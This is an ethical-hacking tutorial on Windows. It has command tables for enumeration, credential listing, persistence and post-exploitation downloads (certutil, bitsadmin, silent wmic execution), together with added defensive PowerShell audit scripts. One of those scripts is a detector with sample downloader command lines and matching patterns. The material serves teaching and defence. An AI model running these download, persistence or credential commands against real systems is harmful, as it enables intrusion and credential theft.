Step 1: What is Windows OS?
Windows is an Operating System developed by Microsoft.

It controls hardware (CPU, memory, storage) and lets users run software.

Versions include: Windows 7, 8, 10, 11, and Windows Server editions.

✅ In hacking, Windows is important because:

It's the most common OS in businesses.

Many attacks specifically target Windows vulnerabilities.

Step 2: Windows Architecture Overview
Understand the layers that make Windows work:

Layer	Description
User Mode	Where applications (browsers, Word, and so on) run with limited privileges.
Kernel Mode	Where the Windows kernel and drivers manage memory, hardware, and processes.
Hardware Layer	Physical parts (CPU, RAM, disk drives).

Step 3: Important Windows Components to Know
⚡ 1. File System (NTFS)
NTFS (New Technology File System) is the default file system Windows uses to store files.

Supports permissions, encryption, and file compression.

⚡ Hackers often exploit misconfigured file permissions.

⚡ 2. User Accounts & Permissions
Windows uses accounts: Admin, Standard User, Guest.

Accounts belong to groups (Administrators, Users, Guests).

Access Control Lists (ACLs) decide who can read/write files.

⚡ Privilege Escalation often involves mismanaged permissions.
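The ACL point above is easiest to understand by looking at real entries. The following function is an added example (not code from the original tutorial): it reads the ACL of a file or folder with Get-Acl and reports the entries that grant write-type rights to broad, low-privilege principals. Run over Program Files or a service's install directory, it surfaces the "misconfigured file permissions" the text warns about. The list of broad principals uses English account names, which is an assumption; on non-English systems compare SIDs instead.

```powershell
# Added example, not part of the original tutorial.
# Lists ACL entries on a path that give write-type rights to broad principals.
function Get-BroadWriteAccess {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$Path,
        # Principals treated as "broad". Names assume an English locale (assumption).
        [string[]]$BroadPrincipals = @(
            'Everyone',
            'BUILTIN\Users',
            'NT AUTHORITY\Authenticated Users',
            'NT AUTHORITY\INTERACTIVE'
        )
    )

    # Rights that let a principal change or replace content rather than merely read it.
    # Modify, Write and FullControl are composites that include these bits.
    $writeRights = [System.Security.AccessControl.FileSystemRights]::WriteData -bor
                   [System.Security.AccessControl.FileSystemRights]::AppendData -bor
                   [System.Security.AccessControl.FileSystemRights]::Delete -bor
                   [System.Security.AccessControl.FileSystemRights]::ChangePermissions -bor
                   [System.Security.AccessControl.FileSystemRights]::TakeOwnership

    $acl = Get-Acl -LiteralPath $Path
    foreach ($ace in $acl.Access) {
        # Only Allow entries matter here; Deny entries restrict rather than grant.
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($BroadPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $writeRights) -eq 0) { continue }

        [pscustomobject]@{
            Path      = $Path
            Principal = $ace.IdentityReference.Value
            Rights    = $ace.FileSystemRights
            Inherited = $ace.IsInherited   # inherited entries point at a parent folder's ACL
        }
    }
}

# Usage: audit every top-level folder under Program Files.
Get-ChildItem -LiteralPath $env:ProgramFiles -Directory |
    ForEach-Object { Get-BroadWriteAccess -Path $_.FullName } |
    Format-Table -AutoSize
```

A hit on a folder that holds a service executable or a DLL loaded by a privileged process is the kind of finding worth fixing with icacls or by reinstalling the software with default permissions; the Inherited column tells you whether the fix belongs on the folder itself or on its parent.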

⚡ 3. Processes and Services
Processes: running programs, some visible (like Chrome) and some in the background (system tasks).

Services: Special background processes (like print spooler, update services).

View processes in Task Manager and services in services.msc.

⚡ Hackers sometimes target vulnerable services to gain access.

⚡ 4. Registry
A giant database where Windows stores system settings and application configurations.

Accessed using regedit.

Common hacking          

Step 4: Basic Windows Commands for Ethical Hackers
Here are essential command-line tools you must learn:

Command	Purpose
ipconfig	View network IP settings.
net user	See user accounts.
tasklist	List running processes.
netstat	View active network connections.
wmic	Query system information through WMI (Windows Management Instrumentation).
reg query	Read Registry entries.
sc query	View running services.
⚡ Command line skills are critical for silent and effective hacking.
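A practitioner rarely reads netstat and tasklist separately; the useful view is "which process owns which listening port, and where does its executable live". The block below is an added example (not from the original tutorial) that builds that view in PowerShell. It assumes Windows 8 / Server 2012 or later, where Get-NetTCPConnection exists, and an elevated shell if you want paths for system-owned processes. The list of trusted directories is an illustrative choice, not a Windows setting. Note that wmic, listed above, is deprecated in current Windows releases; Get-CimInstance is the supported PowerShell replacement for the same WMI queries.

```powershell
# Added example, not part of the original tutorial.
# Joins listening TCP ports to their owning process and flags executables
# outside the directories you consider expected.
function Get-ListeningPortOwner {
    [CmdletBinding()]
    param(
        # Illustrative "expected" roots (assumption); adjust for your environment.
        [string[]]$TrustedRoots = @(
            "$env:SystemRoot\System32",
            $env:ProgramFiles,
            ${env:ProgramFiles(x86)}   # null on 32-bit hosts; guarded below
        )
    )

    Get-NetTCPConnection -State Listen | ForEach-Object {
        $conn = $_
        # Some system processes refuse path queries from a non-elevated shell; keep going.
        $proc = Get-Process -Id $conn.OwningProcess -ErrorAction SilentlyContinue
        $path = $proc.Path

        $trusted = $false
        if ($path) {
            foreach ($root in $TrustedRoots) {
                if ($root -and $path.StartsWith($root, [System.StringComparison]::OrdinalIgnoreCase)) {
                    $trusted = $true
                    break
                }
            }
        }

        [pscustomobject]@{
            LocalAddress = $conn.LocalAddress
            LocalPort    = $conn.LocalPort
            PID          = $conn.OwningProcess
            Process      = if ($proc) { $proc.ProcessName } else { '(unknown)' }
            Path         = if ($path) { $path } else { '(unavailable; run elevated)' }
            Review       = -not $trusted   # $true: executable is outside the trusted roots
        }
    }
}

# Usage: run from an elevated PowerShell for complete path information.
Get-ListeningPortOwner | Sort-Object LocalPort | Format-Table -AutoSize
```

Rows marked Review are not verdicts; third-party software legitimately listens from its own install directory. The point is to make "what is listening, and is it what I expect" a question you can answer in one command instead of by cross-referencing two text dumps by PID.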

Step 5: Common Windows Vulnerabilities
Some famous types of attacks on Windows systems:

Unpatched Systems: Missing security updates.

Weak Passwords: Easily cracked admin accounts.

Misconfigured Services: Services running with too many privileges.

Insecure Registry Settings: Dangerous autorun programs.

DLL Hijacking: tricking a program into loading an attacker-controlled DLL in place of a legitimate one.

✅ Always research the latest CVEs (Common Vulnerabilities and Exposures) related to Windows.


Step 6: Windows Networking Basics
Windows uses the SMB protocol for file sharing; SMB was also the vector for attacks such as the WannaCry ransomware.

RDP (Remote Desktop Protocol): allows remote login and is a common target for attackers.

Active Directory: Centralized user and computer management for organizations.

⚡ Knowing these helps you test company networks and detect security weaknesses.
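The SMB and RDP points above map to a handful of settings that a reviewer checks first on any Windows host. The following function is an added example (not from the original tutorial) that reads them in one go. It assumes Windows 8 / Server 2012 or later (for the SmbShare and NetTCPIP modules) and an elevated shell, since Get-SmbServerConfiguration requires administrator rights. The registry paths for RDP are the standard Terminal Server keys.

```powershell
# Added example, not part of the original tutorial.
# Reports the SMB and RDP settings most relevant to the attacks mentioned above.
function Get-RemoteAccessPosture {
    [CmdletBinding()]
    param()

    $smb = Get-SmbServerConfiguration

    # RDP enablement and Network Level Authentication live under the Terminal Server keys.
    $tsKey  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    $rdpKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'
    $ts  = Get-ItemProperty -Path $tsKey  -Name fDenyTSConnections -ErrorAction SilentlyContinue
    $nla = Get-ItemProperty -Path $rdpKey -Name UserAuthentication  -ErrorAction SilentlyContinue

    # Get-NetTCPConnection reports an error (not an empty result) when no row matches, hence SilentlyContinue.
    $rdpListening = Get-NetTCPConnection -State Listen -LocalPort 3389 -ErrorAction SilentlyContinue

    [pscustomobject]@{
        SMB1Enabled        = $smb.EnableSMB1Protocol        # SMBv1 is the protocol WannaCry spread over; hardened value is $false
        SMBSigningRequired = $smb.RequireSecuritySignature  # signing protects SMB sessions from tampering; hardened value is $true
        RDPEnabled         = ($ts.fDenyTSConnections -eq 0)
        RDPRequiresNLA     = ($nla.UserAuthentication -eq 1) # NLA authenticates the user before a desktop session is created
        RDPListening       = [bool]$rdpListening
    }
}

# Usage: run elevated. SMB1Enabled = $true, or RDPEnabled = $true without NLA, are findings to follow up.
Get-RemoteAccessPosture | Format-List
```

Disabling SMBv1 is done with Set-SmbServerConfiguration -EnableSMB1Protocol $false (and removing the SMB1 feature on newer builds); the other values are set through Group Policy or the same registry keys the function reads.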


Step 7: Hands-On Practice for Students
Set up a Windows 10 VM using VirtualBox or VMware.

Play with:

Task Manager

Command Prompt (cmd.exe)

PowerShell

Services and Registry Editor

Install Sysinternals Suite (Microsoft’s free toolkit for deep system exploration).

Exercises I (For Students)

✅ Windows Commands for Ethical Hacking & Penetration Testing
⚡ 1. System Information & Enumeration

Command	Purpose
systeminfo	Displays OS version, patches, and hardware info
hostname	Shows the computer’s name
whoami	Displays current logged-in user
echo %username%	Shows the current user's name
net user	Lists all users on the system
net user 	Displays detailed info about a specific user
net localgroup	Shows local groups
net localgroup administrators	Lists members of the admin group

Exercises II (For Students)

✅ 2. Network Reconnaissance

Command	Purpose
ipconfig /all	Shows IP, MAC, and DNS info
ping 	Tests if a host is reachable
tracert 	Traces route packets take to a host
netstat -ano	Lists active connections with PIDs
arp -a	Shows ARP table (IP ↔ MAC)
route print	Displays routing table
nslookup 	DNS info and lookups

Exercises III (For Students)

✅ 3. File System & Directory Access

Command	Purpose
dir /s /b	Lists files and folders recursively (bare format)
attrib -h -s	Reveals hidden/system files
type 	Displays contents of a text file
findstr  	Searches for specific content in a file

Exercises IV (For Students)

⚙️ 4. Password & Credential Dumping

Command	Purpose
net accounts	Shows password policy
runas /user:Administrator cmd	Attempts to run as another user
cmdkey /list	Lists stored credentials
vaultcmd /listcreds	Lists credentials stored in Credential Manager
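The net accounts line above prints the password policy as plain text; turning it into a pass/fail report, together with the per-account flags from Get-LocalUser, is what an auditor actually wants from Step 5's "Weak Passwords" item. The function below is an added example (not from the original tutorial). It assumes an English-language Windows 10 / Server 2016 or later: the net accounts labels are localized, and Get-LocalUser comes from the Microsoft.PowerShell.LocalAccounts module. The thresholds are illustrative baselines, not Windows defaults.

```powershell
# Added example, not part of the original tutorial.
# Summarises "net accounts" policy and local user flags as a list of findings.
function Get-LocalAccountRisk {
    [CmdletBinding()]
    param(
        [int]$MinPasswordLength = 14,    # illustrative baseline (assumption)
        [int]$MaxPasswordAgeDays = 365   # illustrative baseline (assumption)
    )

    # "net accounts" prints "Label:    value" lines (English labels assumed); collect them.
    $policy = @{}
    foreach ($line in (net accounts)) {
        if ($line -match '^(?<label>[^:]+):\s*(?<value>.*)$') {
            $policy[$matches.label.Trim()] = $matches.value.Trim()
        }
    }

    $findings = New-Object System.Collections.Generic.List[string]

    $minLen = 0
    if ([int]::TryParse($policy['Minimum password length'], [ref]$minLen) -and $minLen -lt $MinPasswordLength) {
        $findings.Add("Minimum password length is $minLen (baseline $MinPasswordLength)")
    }
    # net accounts prints "Never" when the lockout threshold is 0.
    if ($policy['Lockout threshold'] -eq 'Never') {
        $findings.Add('No account lockout threshold: repeated wrong passwords are never slowed down')
    }

    # Per-account flags on enabled local users.
    foreach ($u in (Get-LocalUser | Where-Object Enabled)) {
        if (-not $u.PasswordRequired) { $findings.Add("$($u.Name): password not required") }
        if ($u.PasswordNeverExpires)  { $findings.Add("$($u.Name): password never expires") }
        if ($u.PasswordLastSet -and ((Get-Date) - $u.PasswordLastSet).Days -gt $MaxPasswordAgeDays) {
            $findings.Add("$($u.Name): password last set $($u.PasswordLastSet.ToShortDateString())")
        }
    }

    return $findings
}

# Usage: prints one line per finding; an empty result means nothing tripped the baselines.
Get-LocalAccountRisk
```

On a domain-joined machine the effective policy comes from Group Policy rather than the local settings net accounts shows, so treat this as a local-host check and verify domain policy separately.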

Exercises V (For Students)

⚙️ 5. Service & Process Inspection

Command	Purpose
tasklist	Lists all running processes
taskkill /PID  /F	Force kills a process
sc query	Lists all running services
sc qc 	Displays config for a service

Exercises VI (For Students)

⚙️ 6. Persistence & Backdoor (For Awareness in Pentesting)

Command	Purpose
schtasks /query /fo LIST /v	Shows scheduled tasks
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run	Shows programs set to auto-run
wmic startup list full	Lists startup programs
wmic process call create ""	Executes a command silently

Exercises VII (For Students)

⚙️ 7. Windows Registry & Autorun Paths

Command	Purpose
reg query HKCU	Queries current user registry keys
reg add / reg delete	Add or remove registry keys (used in persistence)
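Exercises VI and VII both point at the same places: the Run/RunOnce keys, scheduled tasks, and the startup list. The function below is an added example (not from the original tutorial) that collects those entries and flags the ones whose command points into a user-writable location, which is where unauthorised persistence usually lands. It assumes Windows 8 / Server 2012 or later for the ScheduledTasks module; the list of "writable roots" is an illustrative choice.

```powershell
# Added example, not part of the original tutorial.
# Gathers Run/RunOnce values and scheduled-task actions, then marks entries that
# execute from user-writable directories.
function Get-SuspiciousAutostart {
    [CmdletBinding()]
    param(
        # Directories a standard user can write to (illustrative list, assumption).
        [string[]]$WritableRoots = @(
            $env:APPDATA, $env:LOCALAPPDATA, $env:TEMP,
            $env:ProgramData, $env:PUBLIC, "$env:USERPROFILE\Downloads"
        )
    )

    $runKeys = @(
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
    )

    # Registry autoruns: each value name is an entry, the value data is the command line.
    $entries = @(foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        foreach ($p in $props.PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }   # skip PSPath/PSParentPath provider metadata
            [pscustomobject]@{ Source = $key; Name = $p.Name; Command = [string]$p.Value }
        }
    })

    # Scheduled tasks: every Exec action has Execute (program) and Arguments.
    $entries += @(foreach ($task in Get-ScheduledTask) {
        foreach ($a in $task.Actions) {
            if ($a.Execute) {
                [pscustomobject]@{
                    Source  = "Task:$($task.TaskPath)$($task.TaskName)"
                    Name    = $task.TaskName
                    Command = "$($a.Execute) $($a.Arguments)".Trim()
                }
            }
        }
    })

    foreach ($e in $entries) {
        # Expand %APPDATA%-style variables so the root comparison sees real paths.
        $cmd = [System.Environment]::ExpandEnvironmentVariables($e.Command)
        $flag = $false
        foreach ($root in $WritableRoots) {
            if ($root -and $cmd.IndexOf($root, [System.StringComparison]::OrdinalIgnoreCase) -ge 0) {
                $flag = $true
                break
            }
        }
        $e | Add-Member -NotePropertyName Suspicious -NotePropertyValue $flag -PassThru
    }
}

# Usage: show only the flagged entries.
Get-SuspiciousAutostart | Where-Object Suspicious | Format-Table -AutoSize
```

Flagged rows are candidates for review, not verdicts: some legitimate software (OneDrive's updater, for one) runs from LocalAppData. The useful habit is to compare the output against a known-good baseline of the same machine, and to check Sysinternals Autoruns, which covers many more autostart locations than the two listed here.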


Exercises IX (For Students)

✅ 8. Drive & Shared Resource Enumeration

Command	Purpose
net share	Lists shared folders
net use	Lists mapped network drives
wmic logicaldisk get caption,description,filesystem	Lists drives and formats

Exercises X (For Students)

✅ 9. Scripting & File Transfers (Post-Exploitation)

Command	Purpose
certutil -urlcache -split -f  file.exe	Download file from URL (native tool)
bitsadmin /transfer myDownloadJob /download /priority normal  	Another way to download files
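Because certutil and bitsadmin ship with Windows, their use as downloaders is something defenders watch for rather than block outright. The block below is an added example (not from the original tutorial) of the detection side: a function that takes process command lines and reports the ones that match the download patterns from the table above, plus the PowerShell equivalent. The input here is a constructed sample set; in practice the command lines come from the CommandLine field of Security event 4688 or Sysmon event 1. The patterns are assumptions kept deliberately loose.

```powershell
# Added example, not part of the original tutorial.
# Matches process command lines against native-downloader patterns.
function Find-NativeDownloader {
    [CmdletBinding()]
    param([Parameter(Mandatory, ValueFromPipeline)][string]$CommandLine)

    begin {
        # Rule set (assumption): switch order varies, so each pattern is loose.
        $rules = @(
            @{ Name = 'certutil-urlcache';     Pattern = '(?i)certutil(\.exe)?.*-urlcache.*-f\b' },
            @{ Name = 'bitsadmin-transfer';    Pattern = '(?i)bitsadmin(\.exe)?.*/transfer\b' },
            @{ Name = 'powershell-webrequest'; Pattern = '(?i)(powershell|pwsh).*(Invoke-WebRequest|\biwr\b|\bwget\b|\bcurl\b|DownloadFile|DownloadString)' }
        )
    }

    process {
        foreach ($r in $rules) {
            if ($CommandLine -match $r.Pattern) {
                [pscustomobject]@{ Rule = $r.Name; CommandLine = $CommandLine }
            }
        }
    }
}

# Constructed sample command lines (not captured from a real host). The last two
# are legitimate uses that should not match.
$samples = @(
    'certutil.exe -urlcache -split -f http://example.invalid/tool.exe tool.exe',
    'bitsadmin /transfer job /download /priority normal http://example.invalid/x.bin C:\Users\Public\x.bin',
    'powershell -c "Invoke-WebRequest http://example.invalid/a -OutFile a.exe"',
    'certutil.exe -hashfile C:\Windows\notepad.exe SHA256',
    'C:\Windows\System32\svchost.exe -k netsvcs'
)
$samples | Find-NativeDownloader | Format-Table -AutoSize
```

To run this over real data, enable process-creation auditing with command-line logging (Audit Process Creation plus the "Include command line in process creation events" policy), then pipe the message text from Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} into the function. Expect some legitimate hits from software installers and admin scripts; the value is in reviewing them against what you expect on that host.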

Exercises XI (For Students)

✅ 10. Useful PowerShell Commands

Command	Purpose
Get-LocalUser	Lists local user accounts
Get-LocalGroupMember -Group "Administrators"	Lists admin group members
Get-Process	Lists all processes
Invoke-WebRequest 	Downloads files (PowerShell equivalent to curl)